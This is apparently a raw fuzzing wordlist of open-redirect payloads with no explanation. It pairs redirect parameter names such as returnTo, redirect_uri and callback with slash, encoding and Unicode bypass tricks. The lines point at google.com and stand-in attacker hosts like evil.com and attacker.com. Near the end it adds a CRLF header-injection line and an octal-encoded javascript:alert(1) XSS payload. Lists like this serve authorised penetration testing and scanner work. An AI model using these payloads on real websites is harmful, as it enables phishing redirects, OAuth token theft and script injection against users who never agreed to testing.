///bing.com/?www.domain.com/?category=interview&page=2
//bing.com/?www.domain.com/?category=interview&page=2
/bing.com/?www.domain.com/?category=interview&page=2
#/ReturnUrl///google.com
#/return_path///google.com
#/returnpath///google.com
#/return_to///google.com
#/return///google.com
#/returnto///google.com
#/url///google.com
#/path///google.com
#/redirect///google.com
#/redirect_uri///google.com
#/redirection_url///google.com
#/redirect_url///google.com
#/referrer///google.com
#/redir///google.com
#/redirect_to///google.com
#/reference///google.com
#/returnTo///google.com
#/return_url///google.com
#/rt///google.com
#/rurl///google.com
#/dir///google.com
#/data///google.com
#/dest///google.com
#/destination///google.com
#/uri///google.com
#/view///google.com
#/forum_reg///google.com
#/next///google.com
#/navigation///google.com
#/next_page///google.com
#/ref_url///google.com
#/l///google.com
#/return_url///google.com
#/domain_name///google.com
#/authorize_callback///google.com
#/authorize_url///google.com
#/callback///google.com
#/noredirect///google.com
#/redir///google.com
#/link///google.com
#/llink///google.com
#/load///google.com
#/load_url///google.com
#/login///google.com
#/logout///google.com
#/login_url///google.com
#/to///google.com
#/origin///google.com
#/checkout_url///google.com
#/continue///google.com
#/asset///google.com
#/u///google.com
#/go///google.com
#/file_name///google.com
#/file_url///google.com
#/file///google.com
#/folder///google.com
#/folder_url///google.com
#/forward///google.com
#/from_url///google.com
#/succurl///google.com
#/host///google.com
#/recipient///google.com
#/image///google.com
#/image_url///google.com
#/site///google.com
#/domain///google.com
#/target///google.com
#/target_url///google.com
#/targetUrl///google.com
#/val///google.com
#/validate///google.com
#/view///google.com
#/window///google.com
#/ReturnUrl//google.com
#/return_path//google.com
#/returnpath//google.com
#/return_to//google.com
#/return//google.com
#/returnto//google.com
#/url//google.com
#/path//google.com
#/redirect//google.com
#/redirect_uri//google.com
#/redirection_url//google.com
#/redirect_url//google.com
#/referrer//google.com
#/redir//google.com
#/redirect_to//google.com
#/reference//google.com
#/returnTo//google.com
#/return_url//google.com
#/rt//google.com
#/rurl//google.com
#/dir//google.com
#/data//google.com
#/dest//google.com
#/destination//google.com
#/uri//google.com
#/view//google.com
#/forum_reg//google.com
#/next//google.com
#/navigation//google.com
#/next_page//google.com
#/ref_url//google.com
#/l//google.com
#/return_url//google.com
#/domain_name//google.com
#/authorize_callback//google.com
#/authorize_url//google.com
#/callback//google.com
#/noredirect//google.com
#/redir//google.com
#/link//google.com
#/llink//google.com
#/load//google.com
#/load_url//google.com
#/login//google.com
#/logout//google.com
#/login_url//google.com
#/to//google.com
///%2Fgoogle.com/?www.domain.com/?category=interview&page=2
#/path///%2Fgoogle.com
//%2Fgoogle.com/
/%2Fgoogle.com/
///%2Fgoogle.com
http://%2Fgoogle.com
%2F%2Fgoogle.com
/%2Fgoogle.com/..;/css
https:/%5c%2Fgoogle.com/
/%2Fgoogle.com/%2f%2e%2e
%09http:///zeit.co%40%2Fgoogle.com
%5c%2Fgoogle.com
/%2Fgoogle.com/%2f../
http%3a%2f%2f%2Fgoogle.com%2f
@%2Fgoogle.com
<>//%2Fgoogle.com
///;@%2Fgoogle.com
%40%2Fgoogle.com/
//;@%2Fgoogle.com
//%2Fgoogle.com/%2e%2e
/%2Fgoogle.com/%2F..
////%2Fgoogle.com/%2f%2e%2e/%2f%2e%2e
%09/%2Fgoogle.com
http:///@%2Fgoogle.com//localhost
https://%2Fgoogle.com/EvilFile.xx
//////////////////////%2Fgoogle.com
#//%2Fgoogle.com/
#/origin//google.com
#/checkout_url//google.com
#/continue//google.com
#/asset//google.com
#/u//google.com
#/go//google.com
#/file_name//google.com
#/file_url//google.com
#/file//google.com
#/folder//google.com
#/folder_url//google.com
#/forward//google.com
#/from_url//google.com
#/succurl//google.com
#/host//google.com
#/recipient//google.com
#/image//google.com
#/image_url//google.com
#/site//google.com
#/domain//google.com
#/target//google.com
#/target_url//google.com
#/targetUrl//google.com
#/val//google.com
#/validate//google.com
#/view//google.com
#/window//google.com
#/ReturnUrl/google.com
#/return_path/google.com
#/returnpath/google.com
#/return_to/google.com
#/return/google.com
#/returnto/google.com
#/url/google.com
#/path/google.com
#/redirect/google.com
#/redirect_uri/google.com
#/redirection_url/google.com
#/redirect_url/google.com
#/referrer/google.com
#/redir/google.com
#/redirect_to/google.com
#/reference/google.com
#/returnTo/google.com
#/return_url/google.com
#/rt/google.com
#/rurl/google.com
#/dir/google.com
#/data/google.com
#/dest/google.com
#/destination/google.com
#/uri/google.com
#/view/google.com
#/forum_reg/google.com
#/next/google.com
#/navigation/google.com
#/next_page/google.com
#/ref_url/google.com
#/l/google.com
#/return_url/google.com
#/domain_name/google.com
#/authorize_callback/google.com
#/authorize_url/google.com
#/callback/google.com
#/noredirect/google.com
#/redir/google.com
///%2Fgoogle%252Ecom/?www.domain.com/?category=interview&page=2
#/path///%2Fgoogle%252Ecom
//%2Fgoogle%252Ecom/
/%2Fgoogle%252Ecom/
///%2Fgoogle%252Ecom
http://%2Fgoogle%252Ecom
%2F%2Fgoogle%252Ecom
/%2Fgoogle%252Ecom/..;/css
https:/%5c%2Fgoogle%252Ecom/
/%2Fgoogle%252Ecom/%2f%2e%2e
%09http:///zeit.co%40%2Fgoogle%252Ecom
%5c%2Fgoogle%252Ecom
/%2Fgoogle%252Ecom/%2f../
http%3a%2f%2f%2Fgoogle%252Ecom%2f
@%2Fgoogle%252Ecom
<>//%2Fgoogle%252Ecom
///;@%2Fgoogle%252Ecom
%40%2Fgoogle%252Ecom/
//;@%2Fgoogle%252Ecom
//%2Fgoogle%252Ecom/%2e%2e
/%2Fgoogle%252Ecom/%2F..
////%2Fgoogle%252Ecom/%2f%2e%2e/%2f%2e%2e
%09/%2Fgoogle%252Ecom
http:///@%2Fgoogle%252Ecom//localhost
https://%2Fgoogle%252Ecom/EvilFile.xx
//////////////////////%2Fgoogle%252Ecom
#//%2Fgoogle%252Ecom/
#/link/google.com
#/llink/google.com
#/load/google.com
#/load_url/google.com
#/login/google.com
#/logout/google.com
#/login_url/google.com
#/to/google.com
#/origin/google.com
#/checkout_url/google.com
#/continue/google.com
#/asset/google.com
#/u/google.com
#/go/google.com
#/file_name/google.com
#/file_url/google.com
#/file/google.com
#/folder/google.com
#/folder_url/google.com
#/forward/google.com
#/from_url/google.com
#/succurl/google.com
#/host/google.com
#/recipient/google.com
#/image/google.com
#/image_url/google.com
#/site/google.com
#/domain/google.com
#/target/google.com
#/target_url/google.com
#//#//google.com//
#//%09/blackfan.ru/
#//%09http:///zeit.co%40google.com/
#//%2Fgoogle%252Ecom/
#//%40evil.com//
#//%5cblackfan.ru/
#//%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/
#///\google.com/
#//<>//google.com/
#//@google.com/
#//http%3a%2f%2fevil.com%2f/
#//http:///@attacker.com//localhost/
#//https:/%5cblackfan.ru//
#//https://evildomain.xx/EvilFile.xx/
#/path///#//google.com/
#/path///%09/blackfan.ru
#/path///%09http:///zeit.co%40google.com
#/path///%2Fgoogle%252Ecom
#/path///%40evil.com/
#/path///%5cblackfan.ru
#/path///%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
#/path////\google.com
#/path///<>//google.com
#/path///@google.com
#/path///http%3a%2f%2fevil.com%2f
#/path///http:///@attacker.com//localhost
#/path///https:/%5cblackfan.ru/
#/path///https://evildomain.xx/EvilFile.xx
%09/#//google.com/
%09/%09/blackfan.ru
%09/%09http:///zeit.co%40google.com
%09/%2Fgoogle%252Ecom
%09/%40evil.com/
%09/%5cblackfan.ru
%09/%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
%09//\google.com
%09/<>//google.com
%09/@google.com
%09/http%3a%2f%2fevil.com%2f
%09/http:///@attacker.com//localhost
%09/https:/%5cblackfan.ru/
%09/https://evildomain.xx/EvilFile.xx
%09http:///zeit.co%40#//google.com/
%09http:///zeit.co%40%09/blackfan.ru
%09http:///zeit.co%40%09http:///zeit.co%40google.com
%09http:///zeit.co%40%2Fgoogle%252Ecom
%09http:///zeit.co%40%40evil.com/
%09http:///zeit.co%40%5cblackfan.ru
%09http:///zeit.co%40%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
%09http:///zeit.co%40/\google.com
%09http:///zeit.co%40<>//google.com
%09http:///zeit.co%40@google.com
%09http:///zeit.co%40http%3a%2f%2fevil.com%2f
%09http:///zeit.co%40http:///@attacker.com//localhost
%09http:///zeit.co%40https:/%5cblackfan.ru/
%09http:///zeit.co%40https://evildomain.xx/EvilFile.xx
%2F#//google.com/
%2F%09/blackfan.ru
%2F%09http:///zeit.co%40google.com
%2F%2Fgoogle%252Ecom
%2F%40evil.com/
%2F%5cblackfan.ru
%2F%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
%2F/\google.com
%2F<>//google.com
%2F@google.com
%2Fhttp%3a%2f%2fevil.com%2f
%2Fhttp:///@attacker.com//localhost
%2Fhttps:/%5cblackfan.ru/
%2Fhttps://evildomain.xx/EvilFile.xx
%40#//google.com//
%40%09/blackfan.ru/
%40%09http:///zeit.co%40google.com/
%40%2Fgoogle%252Ecom/
%40%40evil.com//
%40%5cblackfan.ru/
%40%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/
%40/\google.com/
%40<>//google.com/
%40@google.com/
%40http%3a%2f%2fevil.com%2f/
%40http:///@attacker.com//localhost/
%40https:/%5cblackfan.ru//
%40https://evildomain.xx/EvilFile.xx/
%5c#//google.com/
%5c%09/blackfan.ru
%5c%09http:///zeit.co%40google.com
%5c%2Fgoogle%252Ecom
%5c%40evil.com/
%5c%5cblackfan.ru
%5c%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
%5c/\google.com
%5c<>//google.com
%5c@google.com
%5chttp%3a%2f%2fevil.com%2f
%5chttp:///@attacker.com//localhost
%5chttps:/%5cblackfan.ru/
%5chttps://evildomain.xx/EvilFile.xx
/#//google.com//
/#//google.com//%2F..
/#//google.com//%2f%2e%2e
/#//google.com//%2f../
/#//google.com//..;/css
/%09/blackfan.ru/
/%09/blackfan.ru/%2F..
/%09/blackfan.ru/%2f%2e%2e
/%09/blackfan.ru/%2f../
/%09/blackfan.ru/..;/css
/%09http:///zeit.co%40google.com/
/%09http:///zeit.co%40google.com/%2F..
/%09http:///zeit.co%40google.com/%2f%2e%2e
/%09http:///zeit.co%40google.com/%2f../
/%09http:///zeit.co%40google.com/..;/css
/%2Fgoogle%252Ecom/
/%2Fgoogle%252Ecom/%2F..
/%2Fgoogle%252Ecom/%2f%2e%2e
/%2Fgoogle%252Ecom/%2f../
/%2Fgoogle%252Ecom/..;/css
/%40evil.com//
/%40evil.com//%2F..
/%40evil.com//%2f%2e%2e
/%40evil.com//%2f../
/%40evil.com//..;/css
/%5cblackfan.ru/
/%5cblackfan.ru/%2F..
/%5cblackfan.ru/%2f%2e%2e
/%5cblackfan.ru/%2f../
/%5cblackfan.ru/..;/css
/%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/
/%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/%2F..
/%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/%2f%2e%2e
/%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/%2f../
/%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/..;/css
//#//google.com//
//#//google.com//%2e%2e
//%09/blackfan.ru/
//%09/blackfan.ru/%2e%2e
//%09http:///zeit.co%40google.com/
//%09http:///zeit.co%40google.com/%2e%2e
//%2Fgoogle%252Ecom/
//%2Fgoogle%252Ecom/%2e%2e
//%40evil.com//
//%40evil.com//%2e%2e
//%5cblackfan.ru/
//%5cblackfan.ru/%2e%2e
//%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/
//%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/%2e%2e
///#//google.com/
///#//google.com//?www.domain.com/?category=interview&page=2
///%09/blackfan.ru
///%09/blackfan.ru/?www.domain.com/?category=interview&page=2
///%09http:///zeit.co%40google.com
///%09http:///zeit.co%40google.com/?www.domain.com/?category=interview&page=2
///%2Fgoogle%252Ecom
///%2Fgoogle%252Ecom/?www.domain.com/?category=interview&page=2
///%40evil.com/
///%40evil.com//?www.domain.com/?category=interview&page=2
///%5cblackfan.ru
///%5cblackfan.ru/?www.domain.com/?category=interview&page=2
///%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
///%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/?www.domain.com/?category=interview&page=2
////#//google.com//%2f%2e%2e/%2f%2e%2e
////%09/blackfan.ru/%2f%2e%2e/%2f%2e%2e
////%09http:///zeit.co%40google.com/%2f%2e%2e/%2f%2e%2e
////%2Fgoogle%252Ecom/%2f%2e%2e/%2f%2e%2e
////%40evil.com//%2f%2e%2e/%2f%2e%2e
////%5cblackfan.ru/%2f%2e%2e/%2f%2e%2e
////%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/%2f%2e%2e/%2f%2e%2e
//////////////////////#//google.com/
//////////////////////%09/blackfan.ru
//////////////////////%09http:///zeit.co%40google.com
//////////////////////%2Fgoogle%252Ecom
//////////////////////%40evil.com/
//////////////////////%5cblackfan.ru
//////////////////////%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
///////////////////////\google.com
//////////////////////<>//google.com
//////////////////////@google.com
//////////////////////http%3a%2f%2fevil.com%2f
//////////////////////http:///@attacker.com//localhost
//////////////////////https:/%5cblackfan.ru/
//////////////////////https://evildomain.xx/EvilFile.xx
/////\google.com/%2f%2e%2e/%2f%2e%2e
////<>//google.com/%2f%2e%2e/%2f%2e%2e
////@google.com/%2f%2e%2e/%2f%2e%2e
////\google.com
////\google.com/?www.domain.com/?category=interview&page=2
////http%3a%2f%2fevil.com%2f/%2f%2e%2e/%2f%2e%2e
////http:///@attacker.com//localhost/%2f%2e%2e/%2f%2e%2e
////https:/%5cblackfan.ru//%2f%2e%2e/%2f%2e%2e
////https://evildomain.xx/EvilFile.xx/%2f%2e%2e/%2f%2e%2e
///;@#//google.com/
///;@%09/blackfan.ru
///;@%09http:///zeit.co%40google.com
///;@%2Fgoogle%252Ecom
///;@%40evil.com/
///;@%5cblackfan.ru
///;@%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
///;@/\google.com
///;@<>//google.com
///;@@google.com
///;@http%3a%2f%2fevil.com%2f
///;@http:///@attacker.com//localhost
///;@https:/%5cblackfan.ru/
///;@https://evildomain.xx/EvilFile.xx
///<>//google.com
///<>//google.com/?www.domain.com/?category=interview&page=2
///@google.com
///@google.com/?www.domain.com/?category=interview&page=2
///\google.com/
///\google.com/%2e%2e
///http%3a%2f%2fevil.com%2f
///http%3a%2f%2fevil.com%2f/?www.domain.com/?category=interview&page=2
///http:///@attacker.com//localhost
///http:///@attacker.com//localhost/?www.domain.com/?category=interview&page=2
///https:/%5cblackfan.ru/
///https:/%5cblackfan.ru//?www.domain.com/?category=interview&page=2
///https://evildomain.xx/EvilFile.xx
///https://evildomain.xx/EvilFile.xx/?www.domain.com/?category=interview&page=2
//;@#//google.com/
//;@%09/blackfan.ru
//;@%09http:///zeit.co%40google.com
//;@%2Fgoogle%252Ecom
//;@%40evil.com/
//;@%5cblackfan.ru
//;@%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
//;@/\google.com
//;@<>//google.com
//;@@google.com
//;@http%3a%2f%2fevil.com%2f
//;@http:///@attacker.com//localhost
//;@https:/%5cblackfan.ru/
//;@https://evildomain.xx/EvilFile.xx
//<>//google.com/
//<>//google.com/%2e%2e
//@google.com/
//@google.com/%2e%2e
//\google.com/
//\google.com/%2F..
//\google.com/%2f%2e%2e
//\google.com/%2f../
//\google.com/..;/css
//http%3a%2f%2fevil.com%2f/
//http%3a%2f%2fevil.com%2f/%2e%2e
//http:///@attacker.com//localhost/
//http:///@attacker.com//localhost/%2e%2e
//https:/%5cblackfan.ru//
//https:/%5cblackfan.ru//%2e%2e
//https://evildomain.xx/EvilFile.xx/
//https://evildomain.xx/EvilFile.xx/%2e%2e
/<>//google.com/
/<>//google.com/%2F..
/<>//google.com/%2f%2e%2e
/<>//google.com/%2f../
/<>//google.com/..;/css
/@google.com/
/@google.com/%2F..
/@google.com/%2f%2e%2e
/@google.com/%2f../
/@google.com/..;/css
/http%3a%2f%2fevil.com%2f/
/http%3a%2f%2fevil.com%2f/%2F..
/http%3a%2f%2fevil.com%2f/%2f%2e%2e
/http%3a%2f%2fevil.com%2f/%2f../
/http%3a%2f%2fevil.com%2f/..;/css
/http:///@attacker.com//localhost/
/http:///@attacker.com//localhost/%2F..
/http:///@attacker.com//localhost/%2f%2e%2e
/http:///@attacker.com//localhost/%2f../
/http:///@attacker.com//localhost/..;/css
/https:/%5cblackfan.ru//
/https:/%5cblackfan.ru//%2F..
/https:/%5cblackfan.ru//%2f%2e%2e
/https:/%5cblackfan.ru//%2f../
/https:/%5cblackfan.ru//..;/css
/https://evildomain.xx/EvilFile.xx/
/https://evildomain.xx/EvilFile.xx/%2F..
/https://evildomain.xx/EvilFile.xx/%2f%2e%2e
/https://evildomain.xx/EvilFile.xx/%2f../
/https://evildomain.xx/EvilFile.xx/..;/css
<>//#//google.com/
<>//%09/blackfan.ru
<>//%09http:///zeit.co%40google.com
<>//%2Fgoogle%252Ecom
<>//%40evil.com/
<>//%5cblackfan.ru
<>//%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
<>///\google.com
<>//<>//google.com
<>//@google.com
<>//http%3a%2f%2fevil.com%2f
<>//http:///@attacker.com//localhost
<>//https:/%5cblackfan.ru/
<>//https://evildomain.xx/EvilFile.xx
@#//google.com/
@%09/blackfan.ru
@%09http:///zeit.co%40google.com
@%2Fgoogle%252Ecom
@%40evil.com/
@%5cblackfan.ru
@%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
@/\google.com
@<>//google.com
@@google.com
@http%3a%2f%2fevil.com%2f
@http:///@attacker.com//localhost
@https:/%5cblackfan.ru/
@https://evildomain.xx/EvilFile.xx
http%3a%2f%2f#//google.com/%2f
http%3a%2f%2f%09/blackfan.ru%2f
http%3a%2f%2f%09http:///zeit.co%40google.com%2f
http%3a%2f%2f%2Fgoogle%252Ecom%2f
http%3a%2f%2f%40evil.com/%2f
http%3a%2f%2f%5cblackfan.ru%2f
http%3a%2f%2f%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg%2f
http%3a%2f%2f/\google.com%2f
http%3a%2f%2f<>//google.com%2f
http%3a%2f%2f@google.com%2f
http%3a%2f%2fhttp%3a%2f%2fevil.com%2f%2f
http%3a%2f%2fhttp:///@attacker.com//localhost%2f
http%3a%2f%2fhttps:/%5cblackfan.ru/%2f
http%3a%2f%2fhttps://evildomain.xx/EvilFile.xx%2f
http://#//google.com/
http://%09/blackfan.ru
http://%09http:///zeit.co%40google.com
http://%2Fgoogle%252Ecom
http://%40evil.com/
http://%5cblackfan.ru
http://%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg
http:///@#//google.com///localhost
http:///@%09/blackfan.ru//localhost
http:///@%09http:///zeit.co%40google.com//localhost
http:///@%2Fgoogle%252Ecom//localhost
http:///@%40evil.com///localhost
http:///@%5cblackfan.ru//localhost
http:///@%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg//localhost
http:///@/\google.com//localhost
http:///@<>//google.com//localhost
http:///@@google.com//localhost
http:///@http%3a%2f%2fevil.com%2f//localhost
http:///@http:///@attacker.com//localhost//localhost
http:///@https:/%5cblackfan.ru///localhost
http:///@https://evildomain.xx/EvilFile.xx//localhost
http:///\google.com
http://<>//google.com
http://@google.com
http://http%3a%2f%2fevil.com%2f
http://http:///@attacker.com//localhost
http://https:/%5cblackfan.ru/
http://https://evildomain.xx/EvilFile.xx
https:/%5c#//google.com//
https:/%5c%09/blackfan.ru/
https:/%5c%09http:///zeit.co%40google.com/
https:/%5c%2Fgoogle%252Ecom/
https:/%5c%40evil.com//
https:/%5c%5cblackfan.ru/
https:/%5c%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/
https:/%5c/\google.com/
https:/%5c<>//google.com/
https:/%5c@google.com/
https:/%5chttp%3a%2f%2fevil.com%2f/
https:/%5chttp:///@attacker.com//localhost/
https:/%5chttps:/%5cblackfan.ru//
https:/%5chttps://evildomain.xx/EvilFile.xx/
https://#//google.com//EvilFile.xx
https://%09/blackfan.ru/EvilFile.xx
https://%09http:///zeit.co%40google.com/EvilFile.xx
https://%2Fgoogle%252Ecom/EvilFile.xx
https://%40evil.com//EvilFile.xx
https://%5cblackfan.ru/EvilFile.xx
https://%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88%E2%96%88/PugOfConcept/nopuppies.jpg/EvilFile.xx
https:///\google.com/EvilFile.xx
https://<>//google.com/EvilFile.xx
https://@google.com/EvilFile.xx
https://http%3a%2f%2fevil.com%2f/EvilFile.xx
https://http:///@attacker.com//localhost/EvilFile.xx
https://https:/%5cblackfan.ru//EvilFile.xx
https://https://evildomain.xx/EvilFile.xx/EvilFile.xx
#/targetUrl/google.com
#/val/google.com
#/validate/google.com
#/view/google.com
#/window/google.com
///evil.com/
//evil.com/
/evil.com/
evil.com/
http://evil.com
https://evil.com
http:evil.com
%2Fgoogle.com
%2Fgoogle%252Ecom
%2Fgoogle%252Ecom/%2f%2e%2e
///216.58.217.206/calendar
//216.58.217.206/calendar
/216.58.217.206/calendar
/blackfan.ru/..;/css
https:/%5cblackfan.ru/
/www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
//www.google.com/%2f%2e%2e
%09http:///zeit.co%40google.com/%2f%2e%2e
%5cblackfan.ru/%2f%2e%2e
%5cblackfan.ru/..;/css
%5cblackfan%252Eru
%5cblackfan%252Eru/%2f%2e%2e
%5cblackfan%252Eru/..;/css
/%5cblackfan.ru
//%5cblackfan.ru
///%5cblackfan.ru
/blackfan.ru/%2f../
//blackfan.ru/%2f../
///blackfan.ru/%2f../
<>//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///\;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
\/\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%00ï½¡ï¼°â“¦
%01https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%01https://google.com
////%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/google.com
///%09/google.com
//%09/google.com
/%09/google.com
&%0d%0a1Location:https://google.com
\152\141\166\141\163\143\162\151\160\164\072alert(1)
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
%2f216.58.214.206//
%2f216.58.214.206
%2f216.58.214.206%2f%2f
